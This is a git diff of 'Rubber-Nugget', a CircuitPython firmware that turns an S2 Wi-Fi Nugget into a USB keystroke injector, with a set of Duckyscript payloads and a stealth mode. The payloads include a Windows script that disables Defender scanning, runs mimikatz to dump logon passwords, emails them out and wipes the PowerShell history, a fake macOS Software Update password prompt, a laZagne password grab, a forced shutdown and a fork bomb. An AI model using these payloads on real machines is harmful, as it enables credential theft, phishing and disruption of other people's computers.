+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer (another copy).txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer (copy).txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/PwnKit_Cred_Changer.txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Linux/prank/meow.txt

@@ -0,0 +1,34 @@
+REM Title: PwnKit Cred Changer
+REM Author: Alex Lynd
+REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload.
+REM Target: Linux (Bash)
+REM Props: Hak5, HakCat
+REM Version: 1.0
+REM Category: Prank
+
+CTRL ALT T
+DELAY 2000
+
+REM disable mouse
+STRING xinput float 12
+ENTER
+
+
+REM download annoying payload
+
+REM STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh
+ENTER
+DELAY 1000
+STRING chmod +x linux-color-flasher.sh 
+ENTER
+STRING ./linux-color-flasher.sh &
+ENTER
+DELAY 1000
+STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ"
+ENTER
+DELAY 3000
+SPACE
+DELAY 1000
+STRING F
+
+

Alex-Test/payloads/Mac/Phish/Phish.txt

@@ -0,0 +1,49 @@
+#!/bin/bash
+#
+# Title:         Mac Password Phisher
+# Author:        Ahhh
+# Version:       1.0
+#
+# Prompts for user password, writes response to the bunny 
+#
+# Blue...............Starting
+# Amber..............Executing payload
+# Green..............Finished
+#
+
+LED B
+
+LANGUAGE='us'
+lootdir=loot/MacLoot
+
+# Gimme a Keyboard please. Thanks.
+ATTACKMODE HID STORAGE
+LED R G
+
+mkdir -p /root/udisk/$lootdir
+
+# Get a terminal
+QUACK DELAY 400
+QUACK GUI SPACE
+QUACK DELAY 300
+QUACK STRING terminal
+QUACK DELAY 200
+QUACK ENTER
+QUACK DELAY 400
+
+# Make lootdir
+QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/phish
+QUACK ENTER
+QUACK DELAY 200
+QUACK ENTER
+
+# Execute Payload
+QUACK STRING osascript -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to activate\' -e \'tell app \"System Preferences\" to display dialog \"Software Update requires that you type your password to apply changes.\" \& return \& return  default answer \"\" with icon 1 with hidden answer with title \"Software Update\"\'\>/Volumes/BashBunny/$lootdir/phish/pw.txt\; sleep 20\; killall Terminal\;
+QUACK ENTER
+QUACK DELAY 1000
+
+# Sync filesystem
+sync
+
+# Green is the official Light of "finished"
+LED G

Alex-Test/payloads/Mac/Recon/PasswordStealer.txt

@@ -0,0 +1,44 @@
+#!/bin/bash
+#
+# Title:         Mac Password Grabber
+# Author:        Overtimedev
+# Version:       1.0
+#
+# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass 
+# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
+#
+# Amber..............Executing payload
+# Green..............Finished
+#
+
+LED G R
+ATTACKMODE HID STORAGE
+
+lootdir=loot/MacPass
+mkdir -p /root/udisk/$lootdir
+
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 3000
+QUACK STRING cd /Volumes/BashBunny/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING python get-pip.py
+QUACK ENTER
+QUACK DELAY 3000
+QUACK STRING pip install -r requirements.txt
+QUACK ENTER
+QUACK DELAY 3000
+QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
+QUACK ENTER
+QUACK DELAY 10000
+QUACK STRING killall Terminal
+QUACK ENTER
+
+# Sync filesystem
+sync
+
+# Green LED for finished
+LED G

Alex-Test/payloads/Windows/Creds/SimpleUserPasswordGrabber.txt

@@ -0,0 +1,96 @@
+REM Title: windows password grabber
+REM Arthor makozort, https://github.com/makozort
+REM Target: windows 10 (with admin access), might work with windows 7 idk
+REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NO LIABLE FOR ANY MISUSE OF THIS SCRIPT
+REM --------------set default delay based on targets computer speed, 350 is around mid range (I think)
+DEFAULT_DELAY 350
+REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"
+DELAY 1000
+REM ------------open powershell as admin and set an exclusion path in the C:\Users path
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING Set-MpPreference -ExclusionPath C:\Users
+ENTER
+STRING exit
+ENTER
+REM -------------download mimikatz
+GUI r
+STRING cmd
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')
+ENTER
+REM ------------run the following mimikatz commands and print results in new txt file
+DELAY 4000
+STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;
+ENTER 
+STRING privilege::debug
+ENTER
+STRING sekurlsa::logonPasswords full
+ENTER
+STRING exit
+ENTER
+REM< --------- delete mimikatz
+STRING del %TEMP%\pw.exe
+ENTER
+STRING exit
+ENTER
+REM -------------email the pwlog.txt to your email
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+STRING Remove-MpPreference -ExclusionPath C:\Users
+ENTER
+STRING $SMTPServer = 'smtp.gmail.com'
+ENTER
+STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+ENTER
+STRING $SMTPInfo.EnableSsl = $true
+ENTER
+STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com', 'PASSWORDHERE');
+ENTER
+STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
+ENTER
+STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com'
+ENTER
+STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@
+SHIFT 2
+STRING gmail.com')
+ENTER
+STRING $ReportEmail.Subject = 'Hello from the ducky'
+ENTER
+STRING $ReportEmail.Body = 'Attached is your duck report.' 
+ENTER
+STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
+ENTER
+STRING $SMTPInfo.Send($ReportEmail)
+ENTER
+DELAY 4000
+STRING exit
+ENTER
+REM ------cleanup time
+GUI r
+STRING powershell
+CTRL-SHIFT ENTER
+DELAY 600
+ALT y
+REM ----------delete the txt file
+STRING del c:\pwlog.txt
+ENTER
+REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations
+STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
+ENTER
+STRING exit
+ENTER
+REM ------lock the pc
+GUI l

Alex-Test/payloads/Windows/Creds/fastshutdown.txt

@@ -0,0 +1,7 @@
+WINDOWS R
+DELAY 250
+STRING cmd
+ENTER
+DELAY 300
+STRING shutdown /s /f /t 0
+ENTER

Alex-Test/payloads/Windows/Prank/Forkbomb.txt

@@ -0,0 +1,14 @@
+REM HTML Fork Bomb by Jonny Banana
+REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
+DELAY 2000
+CONTROL ESCAPE
+DELAY 200
+STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
+DELAY 200
+ENTER
+REM set a long delay to give time to this disgusting browser
+DELAY 1000
+REM it's time to enable Pop-Up
+TAB
+DELAY 200
+ENTER 

Alex-Test/payloads/Windows/Prank/Notepad.txt

@@ -1,6 +1,7 @@
-REM The next four lines open Notepad in Windows and type "Hello World!"
-GUI r
+REM The next four lines open Notepad in Windows and type "Hello World"
+WINDOWS R
+DELAY 250
 STRING notepad
 ENTER
 DELAY 250
-STRING Hello World!
+STRING Hello World

README.md

@@ -1,11 +1,13 @@
-<h1 align="center">pico-ducky</h1>
+<h1 align="center">Rubber-Nugget</h1>
 
 <div align="center">
-  <strong>Make a cheap but powerful USB Rubber Ducky with a Raspberry Pi Pico</strong>
+  <strong>Deploy up to 5 different Duckyscript payloads with an S2 Wi-Fi Nugget</strong>
+  
 </div>
-
 <br />
-
+<p align="center">
+  <img src="https://cdn.shopify.com/s/files/1/2779/8142/products/S2-Nugget_1024x1024.png" alt="S2 Nugget" title="S2 Nugget" width="500"/>
+</p>
 <div align="center">
   <img alt="GitHub code size in bytes" src="https://img.shields.io/github/languages/code-size/dbisu/pico-ducky">
   <img alt="GitHub license" src="https://img.shields.io/github/license/dbisu/pico-ducky">
@@ -16,52 +18,64 @@
 
 <br />
 
+This is a port of the Pico-Ducky project by Dave Bailey (dbisu, @daveisu), converted to run on the S2 Wi-Fi Nugget
+
+You can buy one here: (https://retia.io/products/wi-fi-nugget-s2-nugget-esp32s2).
+
+
+## Major changes:
+
+To hide the USB drive, hold the DOWN button when plugging in the S2 Nugget and release when the menu face appears.
+
+To auto-inject payload.dd, hold the RIGHT button when plugging in the S2 Nugget.
+
+Once the menu face appears, you can run any one of 4 duckyscript payloads: 
+*  press the UP button to run payload1.dd
+*  press the DOWN button to run payload2.dd 
+*  press the LEFT button to run payload3.dd
+*  press and the RIGHT button to run payload4.dd
+
+To add new payloads, replace the payload.dd files on the CircuitPython drive.
+
 ## Install
 
-Install and have your USB Rubber Ducky working in less than 5 minutes.
+Install and have your USB Rubber Nugget working in less than 5 minutes.
 
-1. Download [CircuitPython for the Raspberry Pi Pico](https://circuitpython.org/board/raspberry_pi_pico/). *Updated to 7.0.0
+1. Download [CircuitPython for the S2 Mini](https://circuitpython.org/board/lolin_s2_mini/). *Updated to 7.0.0
 
-2. Plug the device into a USB port while holding the boot button. It will show up as a removable media device named `RPI-RP2`.
+2. Plug the device into a USB port while holding the RESET button, click the 0 button, then release the RESET button. It will show up as a removable media device named `S2MINIBOOT`.
 
-3. Copy the downloaded `.uf2` file to the root of the Pico (`RPI-RP2`). The device will reboot and after a second or so, it will reconnect as `CIRCUITPY`.
+3. Copy the downloaded `.uf2` file to the root of the S2 Mini (`S2MINIBOOT`). The device will reboot and after a second or so, it will reconnect as `CIRCUITPY`.
 
-4. Download `adafruit-circuitpython-bundle-7.x-mpy-YYYYMMDD.zip` [here](https://github.com/adafruit/Adafruit_CircuitPython_Bundle/releases/latest) and extract it outside the device.
+4. Download and extract the .ZIP file for this project on your computer.
 
-5. Navigate to `lib` in the recently extracted folder and copy `adafruit_hid` to the `lib` folder in your Raspberry Pi Pico.
+5. Copy the following files and folders to your Nugget: `code.py`, `boot.py`, `lib`, `faces`, `payload.dd`, `payload1.dd`, `payload2.dd`, `payload3.dd`, `payload4.dd` 
 
-6. Click [here](https://raw.githubusercontent.com/dbisu/pico-ducky/main/duckyinpython.py), press CTRL + S and save the file as `code.py` in the root of the Raspberry Pi Pico, overwriting the previous file.
+6. Find a script [here](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads) or [create your own one using Ducky Script](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript) and save it as `payload1.dd` in the S2 Nugget. You can add to 4 payloads the same way, adding a number to each payload file name.
 
-7. Find a script [here](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads) or [create your own one using Ducky Script](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript) and save it as `payload.dd` in the Pico.
+7. If you want device to load in stealth mode, hold the down button when plugging in your Nugget to prevent the USB drive from appearing.
 
-8. Be careful, if your device isn't in [setup mode](#setup-mode), the device will reboot and after half a second, the script will run.
+### Attack mode
 
-### Setup mode
+To edit a payload, setup mode is entered automatically when inserted. You can deploy a payload at any time by pressing one of the 4 payload buttons.
 
-To edit the payload, enter setup mode by connecting the pin 1 (`GP0`) to pin 3 (`GND`), this will stop the pico-ducky from injecting the payload in your own machine.
-The easiest way to so is by using a jumper wire between those pins as seen bellow.
+If you want to inject a script with maximum speed, hold the RIGHT button down when inserting your S2 Nugget into the target computer. 
 
-![Setup mode with a jumper](images/setup-mode.png)
+This will cause payload1.dd to be automatically injected as soon as the S2 Nugget is powered up.
 
 ### USB enable/disable mode
 
-If you need the pico-ducky to not show up as a USB mass storage device for stealth, follow these instructions.  
-Enter setup mode.  
-Copy boot.py to the root of the pico-ducky.  
-Copy your payload script to the pico-ducky.  
-Disconnect the pico from your host PC.
-Connect a jumper wire between pin 18 and pin 20.
-This will prevent the pico-ducky from showing up as a USB drive when plugged into the target computer.  
-Remove the jumper and reconnect to your PC to reprogram.
-The default mode is USB mass storage enabled.   
+If you need the S2 Nugget to not show up as a USB mass storage device for stealth, follow these instructions:
 
-![USB enable/disable mode](images/usb-boot-mode.png)
+Hold the DOWN button when plugging in your S2 Nugget. It should load the menu and inject payloads, but not appear as a USB device.
+
+Reset the board without holding down the button to make the device appear as a USB drive again.
 
 ### Changing Keyboard Layouts
 
 Copied from [Neradoc/Circuitpython_Keyboard_Layouts](https://github.com/Neradoc/Circuitpython_Keyboard_Layouts/blob/main/PICODUCKY.md)  
 
-#### How to use one of these layouts with the pico-ducky repository.
+#### How to use one of these layouts with the RubberNugget repository.
 
 **Go to the [latest release page](https://github.com/Neradoc/Circuitpython_Keyboard_Layouts/releases/latest), look if your language is in the list.**
 
@@ -69,7 +83,7 @@ Copied from [Neradoc/Circuitpython_Keyboard_Layouts](https://github.com/Neradoc/
 
 Download the `py` zip, named `circuitpython-keyboard-layouts-py-XXXXXXXX.zip`
 
-**NOTE: You can use the mpy version targetting the version of Circuitpython that is on the device, but on Raspberry Pi Pico you don't need it - they only reduce file size and memory use on load, which the pico has plenty of.**
+**NOTE: You can use the mpy version targetting the version of Circuitpython that is on the device, but on the S2 Nugget you don't need it - they only reduce file size and memory use on load, which the S2 Nugget has plenty of.**
 
 #### If your language/layout is not in the bundle
 
@@ -96,7 +110,7 @@ This is what it should look like **if your language is French for example**.
 
 ![CIRCUITPY drive screenshot](https://github.com/Neradoc/Circuitpython_Keyboard_Layouts/raw/main/docs/drive_pico_ducky.png)
 
-#### Modify the pico-ducky code to use your language file:
+#### Modify the RubberNugget code to use your language file:
 
 At the start of the file comment out these lines:
 

boot.py

@@ -1,9 +1,13 @@
 from board import *
 import digitalio
 import storage
+import board
+import time
+
+time.sleep(3)
 
 noStorageStatus = False
-noStoragePin = digitalio.DigitalInOut(GP15)
+noStoragePin = digitalio.DigitalInOut(board.IO18) ## If the down button is pressed on the S2 Nugget
 noStoragePin.switch_to_input(pull=digitalio.Pull.UP)
 noStorageStatus = not noStoragePin.value
 
@@ -14,3 +18,4 @@ if(noStorageStatus == True):
 else:
     # normal boot
     print("USB drive enabled")
+# Write your code here :-)

code.py

@@ -1,25 +1,62 @@
 # License : GPLv2.0
 # copyright (c) 2021  Dave Bailey
 # Author: Dave Bailey (dbisu, @daveisu)
+# Nugget Fork: Kody Kinzie @skickar
+# Now It Runs One Of 5 Payloads!
 
 import usb_hid
 from adafruit_hid.keyboard import Keyboard
-
+import board
 # comment out these lines for non_US keyboards
 from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS as KeyboardLayout
 from adafruit_hid.keycode import Keycode
+from digitalio import DigitalInOut, Pull
+from adafruit_debouncer import Debouncer
+from board import *
+import busio
+import displayio
+import adafruit_framebuf
+import adafruit_displayio_sh1106
+import time
+import wifi
+import socketpool
+import adafruit_requests
+import ssl
+
+## Screen setup and function to change image on the screen
+displayio.release_displays()
+WIDTH = 130 # Change these to the right size for your display!
+HEIGHT = 64
+BORDER = 1
+i2c = busio.I2C(SCL, SDA) # Create the I2C interface.
+display_bus = displayio.I2CDisplay(i2c, device_address=0x3c)
+display = adafruit_displayio_sh1106.SH1106(display_bus, width=WIDTH, height=HEIGHT) # Create the SH1106 OLED class.
+
+def NugEyes(IMAGE): ## Make a function to put eyes on the screen
+    bitmap = displayio.OnDiskBitmap(IMAGE) # Setup the file as the bitmap data source
+    tile_grid = displayio.TileGrid(bitmap, pixel_shader=bitmap.pixel_shader) # Create a TileGrid to hold the bitmap
+    group = displayio.Group() # Create a Group to hold the TileGrid
+    group.append(tile_grid) # Add the TileGrid to the Group
+    display.show(group) # Add the Group to the Display
+
+NugEyes("/faces/menu.bmp")
+
+# Button 1 = UP
+# Button 2 = DOWN
+# Button 3 = LEFT
+# Button 4 = RIGHT
+pins = (board.IO9, board.IO18, board.IO11, board.IO7)
+buttons = []   # will hold list of Debouncer objects
+for pin in pins:   # set up each pin
+    tmp_pin = DigitalInOut(pin) # defaults to input
+    tmp_pin.pull = Pull.UP      # turn on internal pull-up resistor
+    buttons.append( Debouncer(tmp_pin) )
 
 # uncomment these lines for non_US keyboards
 # replace LANG with appropriate language
 #from keyboard_layout_win_LANG import KeyboardLayout
 #from keycode_win_LANG import Keycode
 
-import time
-import digitalio
-from board import *
-led = digitalio.DigitalInOut(LED)
-led.direction = digitalio.Direction.OUTPUT
-
 duckyCommands = {
     'WINDOWS': Keycode.WINDOWS, 'GUI': Keycode.GUI,
     'APP': Keycode.APPLICATION, 'MENU': Keycode.APPLICATION, 'SHIFT': Keycode.SHIFT,
@@ -32,7 +69,6 @@ duckyCommands = {
     'INSERT': Keycode.INSERT, 'NUMLOCK': Keycode.KEYPAD_NUMLOCK, 'PAGEUP': Keycode.PAGE_UP,
     'PAGEDOWN': Keycode.PAGE_DOWN, 'PRINTSCREEN': Keycode.PRINT_SCREEN, 'ENTER': Keycode.ENTER,
     'SCROLLLOCK': Keycode.SCROLL_LOCK, 'SPACE': Keycode.SPACE, 'TAB': Keycode.TAB,
-    'BAKCKSPACE': Keycode.BACKSPACE, 'DELETE': Keycode.DELETE, 
     'A': Keycode.A, 'B': Keycode.B, 'C': Keycode.C, 'D': Keycode.D, 'E': Keycode.E,
     'F': Keycode.F, 'G': Keycode.G, 'H': Keycode.H, 'I': Keycode.I, 'J': Keycode.J,
     'K': Keycode.K, 'L': Keycode.L, 'M': Keycode.M, 'N': Keycode.N, 'O': Keycode.O,
@@ -42,11 +78,11 @@ duckyCommands = {
     'F4': Keycode.F4, 'F5': Keycode.F5, 'F6': Keycode.F6, 'F7': Keycode.F7,
     'F8': Keycode.F8, 'F9': Keycode.F9, 'F10': Keycode.F10, 'F11': Keycode.F11,
     'F12': Keycode.F12,
-
 }
+
 def convertLine(line):
     newline = []
-    # print(line)
+    print(line)
     # loop on each key - the filter removes empty values
     for key in filter(None, line.split(" ")):
         key = key.upper()
@@ -61,7 +97,7 @@ def convertLine(line):
         else:
             # if it's not a known key name, show the error for diagnosis
             print(f"Unknown key: <{key}>")
-    # print(newline)
+    print(newline)
     return newline
 
 def runScriptLine(line):
@@ -81,42 +117,17 @@ def parseLine(line):
         time.sleep(float(line[6:])/1000)
     elif(line[0:6] == "STRING"):
         sendString(line[7:])
-    elif(line[0:5] == "PRINT"):
-        print("[SCRIPT]: " + line[6:])
-    elif(line[0:6] == "IMPORT"):
-        runScript(line[7:])
     elif(line[0:13] == "DEFAULT_DELAY"):
         defaultDelay = int(line[14:]) * 10
     elif(line[0:12] == "DEFAULTDELAY"):
         defaultDelay = int(line[13:]) * 10
-    elif(line[0:3] == "LED"):
-        if(led.value == True):
-            led.value = False
-        else:
-            led.value = True
     else:
         newScriptLine = convertLine(line)
         runScriptLine(newScriptLine)
 
-kbd = Keyboard(usb_hid.devices)
-layout = KeyboardLayout(kbd)
-
-# sleep at the start to allow the device to be recognized by the host computer
-time.sleep(.5)
-
-# check GP0 for setup mode
-# see setup mode for instructions
-progStatus = False
-progStatusPin = digitalio.DigitalInOut(GP0)
-progStatusPin.switch_to_input(pull=digitalio.Pull.UP)
-progStatus = not progStatusPin.value
-defaultDelay = 0
-
-def runScript(file):
-    global defaultDelay
-    
-    duckyScriptPath = file
-    f = open(duckyScriptPath,"r",encoding='utf-8')
+def injectPayload(payloadNumber):
+    f = open(duckyScriptPath[payloadNumber],"r",encoding='utf-8')
+    print("Running payload.txt")
     previousLine = ""
     duckyScript = f.readlines()
     for line in duckyScript:
@@ -130,12 +141,103 @@ def runScript(file):
             parseLine(line)
             previousLine = line
         time.sleep(float(defaultDelay)/1000)
+    print("Done")
+    NugEyes("/faces/menu.bmp")
 
-if(progStatus == False):
+def startWiFi():
+    # Get wifi details and more from a secrets.py file
+    try:
+        from secrets import secrets
+    except ImportError:
+        print("WiFi secrets are kept in secrets.py, please add them there!")
+        raise
+
+    notConnected = True
+    while(notConnected == True):
+        try:
+            print("Connect wifi")
+            wifi.radio.connect(secrets['ssid'],secrets['password'], timeout=30)
+            notConnected = False
+            #wifi.radio.start_ap(secrets['ssid'],secrets['password'])
+            HOST = repr(wifi.radio.ipv4_address)
+            PORT = 80
+            print(HOST,PORT)
+        except ConnectionError:
+            print("No Wifi Network found, retrying in 5 sec")
+            time.sleep(5)
+
+def connectRemote():
+    startWiFi()
+    host = repr(wifi.radio.ipv4_gateway)
+
+    global requests
+    pool = socketpool.SocketPool(wifi.radio)
+    requests = adafruit_requests.Session(pool, ssl.create_default_context())
+
+    readButtons()
+
+    while True:
+        remoteLoop(host)
+
+def sendRunPayload(host, buttonNum):
+    global requests
+    run_api_url = "http://"+host+"/api/run/"+str(buttonNum)
+    print("Sending ", run_api_url)
+    NugEyes("/faces/boingo.bmp")
+    data = b' '
+    r = requests.get(run_api_url,data=data)
+
+def readButtons():
+    buttonNum = -1
+    for i in range(len(buttons)):
+        buttons[i].update()
+        if buttons[i].fell:
+            print("button",i,"pressed!")
+        if buttons[i].rose:
+            print("button",i,"released!")
+            buttonNum = i + 1
+    return(buttonNum)
+
+def remoteLoop(host):
+    buttonNum = readButtons()
+    #print(buttonNum)
+    if(buttonNum > 0):
+        sendRunPayload(host, buttonNum)
+
+    NugEyes("/faces/remote-menu.bmp")
+
+
+kbd = Keyboard(usb_hid.devices)
+layout = KeyboardLayout(kbd)
+duckyScriptPath = ["payload1.txt", "payload2.txt", "payload3.txt", "payload4.txt", "payload.txt"]
+
+# sleep at the start to allow the device to be recognized by the host computer
+time.sleep(.5)
+defaultDelay = 0
+
+remoteStatus = False
+remoteEnablePin = buttons[3] # Right
+remoteStatus = not remoteEnablePin.value
+defaultDelay = 0
+
+print(remoteStatus)
+
+readButtons()
+
+if(remoteStatus == True):
     # not in setup mode, inject the payload
-    print("Running payload.dd")
-    runScript("payload.dd")
-
+    print("Connecting to remote ducky")
+    connectRemote()
     print("Done")
 else:
-    print("Update your payload")
+    print("Entering menu")
+
+    while True:
+        for i in range(len(buttons)):
+            buttons[i].update()
+            if buttons[i].fell:
+                print("button",i,"pressed!")
+                NugEyes("/faces/boingo.bmp")
+                injectPayload(i)
+            if buttons[i].rose:
+                print("button",i,"released!")

lib/adafruit_displayio_sh1106.py

@@ -0,0 +1,115 @@
+# SPDX-FileCopyrightText: 2017 Scott Shawcroft, written for Adafruit Industries
+# SPDX-FileCopyrightText: Copyright (c) 2021 ladyada for Adafruit Industries
+#
+# SPDX-License-Identifier: MIT
+"""
+`adafruit_displayio_sh1106`
+================================================================================
+
+DisplayIO compatible library for SH1106 OLED displays
+
+
+* Author(s): ladyada
+
+Implementation Notes
+--------------------
+
+**Hardware:**
+
+**Software and Dependencies:**
+
+* Adafruit CircuitPython firmware for the supported boards:
+  https://github.com/adafruit/circuitpython/releases
+
+"""
+
+# imports
+import displayio
+
+__version__ = "0.0.0-auto.0"
+__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_DisplayIO_SH1106.git"
+
+
+# Sequence from sh1106 framebuf driver formatted for displayio init
+_INIT_SEQUENCE = (
+    b"\xae\x00"  # display off, sleep mode
+    b"\xd5\x01\x80"  # divide ratio/oscillator: divide by 2, fOsc (POR)
+    b"\xa8\x01\x3f"  # multiplex ratio = 64 (POR)
+    b"\xd3\x01\x00"  # set display offset mode = 0x0
+    b"\x40\x00"  # set start line
+    b"\xad\x01\x8b"  # turn on DC/DC
+    b"\xa1\x00"  # segment remap = 1 (POR=0, down rotation)
+    b"\xc8\x00"  # scan decrement
+    b"\xda\x01\x12"  # set com pins
+    b"\x81\x01\xff"  # contrast setting = 0xff
+    b"\xd9\x01\x1f"  # pre-charge/dis-charge period mode: 2 DCLKs/2 DCLKs (POR)
+    b"\xdb\x01\x40"  # VCOM deselect level = 0.770 (POR)
+    b"\x20\x01\x20"  #
+    b"\x33\x00"  # turn on VPP to 9V
+    b"\xa6\x00"  # normal (not reversed) display
+    b"\xa4\x00"  # entire display off, retain RAM, normal status (POR)
+    b"\xaf\x00"  # DISPLAY_ON
+)
+
+
+class SH1106(displayio.Display):
+    """
+    SH1106 driver for use with DisplayIO
+
+    :param bus: The bus that the display is connected to.
+    :param int width: The width of the display. Maximum of 132
+    :param int height: The height of the display. Maximum of 64
+    :param int rotation: The rotation of the display. 0, 90, 180 or 270.
+    """
+
+    def __init__(self, bus, **kwargs):
+        init_sequence = bytearray(_INIT_SEQUENCE)
+        super().__init__(
+            bus,
+            init_sequence,
+            **kwargs,
+            color_depth=1,
+            grayscale=True,
+            pixels_in_byte_share_row=False,  # in vertical (column) mode
+            data_as_commands=True,  # every byte will have a command byte preceeding
+            brightness_command=0x81,
+            single_byte_bounds=True,
+            # for sh1107 use column and page addressing.
+            #                lower column command = 0x00 - 0x0F
+            #                upper column command = 0x10 - 0x17
+            #                set page address     = 0xB0 - 0xBF (16 pages)
+            SH1107_addressing=True,
+        )
+        self._is_awake = True  # Display starts in active state (_INIT_SEQUENCE)
+
+    @property
+    def is_awake(self):
+        """
+        The power state of the display. (read-only)
+
+        `True` if the display is active, `False` if in sleep mode.
+        """
+        return self._is_awake
+
+    def sleep(self):
+        """
+        Put display into sleep mode. The display uses < 5uA in sleep mode.
+
+        Sleep mode does the following:
+
+            1) Stops the oscillator and DC-DC circuits
+            2) Stops the OLED drive
+            3) Remembers display data and operation mode active prior to sleeping
+            4) The MP can access (update) the built-in display RAM
+        """
+        if self._is_awake:
+            self.bus.send(int(0xAE), "")  # 0xAE = display off, sleep mode
+            self._is_awake = False
+
+    def wake(self):
+        """
+        Wake display from sleep mode
+        """
+        if not self._is_awake:
+            self.bus.send(int(0xAF), "")  # 0xAF = display on
+            self._is_awake = True

payload.txt

@@ -0,0 +1,8 @@
+REM This is the "Rush" Payload, it asks if you want to extend your car's warranty on MacOS (taken from voicemail transcript) by @skicka
+GUI SPACE
+DELAY 500
+STRING terminal.app
+ENTER
+DELAY 1000
+STRING say "Hi, this is Melanie and I'm giving you a call from the dealer service center. We recently noticed your car's extended warranty would expire and wanted to provide you with one final courtesy call before your warranty expires, June 10th, your warranty coverage becomes voided. This would make you financially responsible for all Service Repairs. If you wish to extend or reinstate your car's warranty, press for now, or press 9 to be continued coverage and discontinue receiving these reminders." && kill -9 $(ps -p $PPID -o ppid=)
+ENTER

payload1.txt

